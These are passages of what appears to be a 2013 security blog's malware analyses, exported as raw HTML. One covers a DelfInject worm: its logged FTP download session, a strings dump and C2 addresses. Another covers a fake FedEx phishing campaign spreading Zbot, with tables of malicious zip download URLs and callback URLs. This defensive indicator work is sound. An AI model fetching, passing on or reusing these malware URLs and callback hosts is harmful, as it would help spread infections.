<pre class="dualColTextStyle" hasbox="2"><strike>I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation. </strike> Site Sinkholed.</pre>
<pre class="dualColTextStyle" hasbox="2">
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Ok, now for some FTP. The malware calls out to FTP server with user name and password in clear text (most appreciated).</pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><table cellpadding="0" cellspacing="0" class="outerTableDual" hasbox="2"><tbody class="outerTableTbody" hasbox="2">
<tr hasbox="2">
<td class="outerTableTbodyTdResponse" hasbox="2"><div class="NETWITNESS_CSS_responseOneColumn" hasbox="2">
<table cellpadding="0" cellspacing="0" hasbox="2" style="width: 100%;">
<tbody hasbox="2">
<tr hasbox="2"><td class="NETWITNESS_CSS_response" hasbox="2" valign="top"><pre class="dualColTextStyle"><span style="color: red;">220 Microsoft FTP Service
USER <redacted>
331 Password required for <redacted>.
PASS <redacted>
230 User logged in.
215 Windows_NT
CWD /dados/maxo4/
250 CWD command successful.
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg
550 The system cannot find the file specified.
</span></pre>
<div>
</div>
<div>
This thing tried multiple jpg files, none of which could be found.</div>
</td><td style="width: 10px;"></td><td align="right" class="NETWITNESS_CSS_responseOneColumn"></td></tr>
</tbody></table>
</div>
</td></tr>
<tr hasbox="2"><td class="outerTableTbodyTdResponse" hasbox="2">Well, I'm not going to let that one go by.</td></tr>
<tr hasbox="2"><td hasbox="2"></td></tr>
<tr hasbox="2"><td class="outerTableTbodyTdResponse" hasbox="2"></td></tr>
</tbody></table>
</pre>
<pre class="dualColTextStyle" hasbox="2">Peaked my interest. I go digging and I find a root directory</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvW88KCRMFx1DLyrdCL0YENOlHFez70AZ8o0H-kt5N67WK3bu3D5j6iW6l08MKgGcJp34QfoUd9Igq3KLtyxju98UExxRyBXnk-3cqJLJwO5eCW-LhY-YCmPDGujgMpPv7imT52ybuV8g/s1600/ftp+directory.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvW88KCRMFx1DLyrdCL0YENOlHFez70AZ8o0H-kt5N67WK3bu3D5j6iW6l08MKgGcJp34QfoUd9Igq3KLtyxju98UExxRyBXnk-3cqJLJwO5eCW-LhY-YCmPDGujgMpPv7imT52ybuV8g/s1600/ftp+directory.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8rJO0mUmV1PObqjlrmNCItrr3D3ZCPKft7Nrdm8xqiT2vjO65N8xRokZk8GgSyWGp_20aVWqAK4Oz84pdUyivUsEjztq32wk5wt_NZiZ9emRSw3ZwRtB-C4LNQDNC2H6PLUxs58D19aE/s1600/ftp-directories.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8rJO0mUmV1PObqjlrmNCItrr3D3ZCPKft7Nrdm8xqiT2vjO65N8xRokZk8GgSyWGp_20aVWqAK4Oz84pdUyivUsEjztq32wk5wt_NZiZ9emRSw3ZwRtB-C4LNQDNC2H6PLUxs58D19aE/s1600/ftp-directories.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPYIQZLyAWynFm110ZlTtuoW0p17K5qWi5zac4TKMBsa9d9j9lgPrRIdhVdQGGiLR25s_2A-QfbD465iEOmLHFQdCeE7O2mFPZ9iENiox75oJzoQqbOODi73Vj6F3MSU5ax1D5xShxeeE/s1600/ftp+jpg.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPYIQZLyAWynFm110ZlTtuoW0p17K5qWi5zac4TKMBsa9d9j9lgPrRIdhVdQGGiLR25s_2A-QfbD465iEOmLHFQdCeE7O2mFPZ9iENiox75oJzoQqbOODi73Vj6F3MSU5ax1D5xShxeeE/s1600/ftp+jpg.PNG" /></a></div>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Interesting, so I download the jpgs that are there. </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGSZQMMD45MIPoonwvdhQhyyCt0loxoKEQbOpb3E7a5Q4CQLum5MxLaESy_vDexcdAZhbAqwEq8MXWmJAfTadUtN0kb_CyjsmX2JzjU_AED9GbBR1knMaWlGaYGpkuKo96v30vdq5w7ag/s1600/virus.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGSZQMMD45MIPoonwvdhQhyyCt0loxoKEQbOpb3E7a5Q4CQLum5MxLaESy_vDexcdAZhbAqwEq8MXWmJAfTadUtN0kb_CyjsmX2JzjU_AED9GbBR1knMaWlGaYGpkuKo96v30vdq5w7ag/s1600/virus.PNG" /></a></div>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">The worm is a variant on DelfInject.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><b>MZP ÿÿ¸@ º ´ Í!¸ LÍ!This program must be run under Win32 $</b></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Dumping the strings:</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
<b>winspool.drv</b>
<b>OpenPrinterW
</b>ntdll
NtUnmapViewOfSection</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">00000085 : <span class="hexPacketPayload" hasbox="2">00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30</span> [<span class="hexPacketPayload" hasbox="2">.......173.4.250</span>]
00000095 : <span class="hexPacketPayload" hasbox="2">02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61</span> [<span class="hexPacketPayload" hasbox="2">.10.in-addr.arpa</span>]
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">173.4.250.10</pre>
<pre class="dualColTextStyle" hasbox="2"><span style="background-color: white; font-family: Tahoma, Verdana, Arial, Helvetica, sans-serif; font-size: 11px; white-space: nowrap;">88.191.130.98:8080</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">jindalo.ru:8080</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">111.68.142.223</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="background-color: white; font-family: Tahoma, Verdana, Arial, Helvetica, sans-serif; font-size: 11px; white-space: nowrap;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2">Additional References:</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://labs.snort.org/iplists/urllist-2012-07-01">http://labs.snort.org/iplists/urllist-2012-07-01</a></pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/">http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/</a></pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI">http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-18250401323764987812013-03-26T12:33:00.000-07:002013-03-31T12:44:43.789-07:00Fake FedEx Phishing Zbot<br />
<span style="font-size: large;"><b>URL Query Examples:</b></span><br />
http://urlquery.net/search.php?q=fedex_trk&type=string&start=2013-03-11&end=2013-03-26&max=50<br />
<br />
<table class="test " style="background-color: white; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-collapse: collapse; border-spacing: 0px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(0, 0, 0); color: #222222; font-family: 'Segoe UI', Segoe, 'Helvetica Neue', Helvetica, Roboto, Arial, FreeSans, sans-serif; font-size: 12px; line-height: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 967px;"><tbody style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-26 16:38:29</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1618524" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />208.109.227.206</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-26 10:18:09</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1615834" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://ilconline.org/images/fedex_trk_61293150511865307217.zip">http://ilconline.org/images/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />208.109.138.8</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 17:26:17</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1594225" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://ilconline.org/images/fedex_trk_61293150511865307217.zip">http://ilconline.org/images/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />208.109.138.8</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:32:11</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1592151" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:26:38</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1592062" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:21:55</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591994" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:18:27</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591941" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:12:23</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591841" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:10:29</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591804" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 15:01:10</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591641" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 14:59:39</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591617" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-25 14:47:02</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1591418" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip">http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/us.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="United States" width="16" />72.167.183.50</td></tr>
</tbody></table>
<br />
<i>Got get it</i><br />
<br />
<b><span style="font-size: large;">Offending Host:</span></b><br />
<strike>178.175.139.47 </strike>Taken down<br />
<span style="background-color: white; color: #002b82; font-weight: bold;"><span style="font-family: inherit;"><strike>213.57.77.220 </strike> Taken down</span></span><br />
hotels2013.org<br />
adverts2013.org<br />
yamaha-motor2013.com<br />
<br />
UPDATE: Callback:<br />
<table class="test " style="background-color: white; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-collapse: collapse; border-spacing: 0px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(0, 0, 0); color: #222222; font-family: 'Segoe UI', Segoe, 'Helvetica Neue', Helvetica, Roboto, Arial, FreeSans, sans-serif; font-size: 12px; line-height: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 967px;"><thead style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr class="header" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="90px">Date (CET)</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="80px">Alerts / IDS</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;">URL</th><th style="background-color: #2d3c4e; border: 0px; color: white; margin: 0px; outline: 0px; padding: 5px; vertical-align: baseline;" width="110px">IP</th></tr>
</thead><tbody style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-31 11:57:12</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1702609" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:26:22</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692254" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://geographic-channel.com/pmserver/browse.php">http://geographic-channel.com/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
